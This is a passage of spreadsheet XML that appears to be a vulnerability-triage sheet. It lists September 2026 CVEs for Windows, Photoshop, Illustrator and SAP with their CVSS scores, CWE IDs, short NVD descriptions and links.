          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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8" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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9" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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0" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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1" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73014</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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3" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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7" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7476</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S618"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T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7477</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S619"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T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75631</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S62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T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S622"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T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S623"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T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75992</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S625"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T625" s="6" t="inlineStr">
        <is>
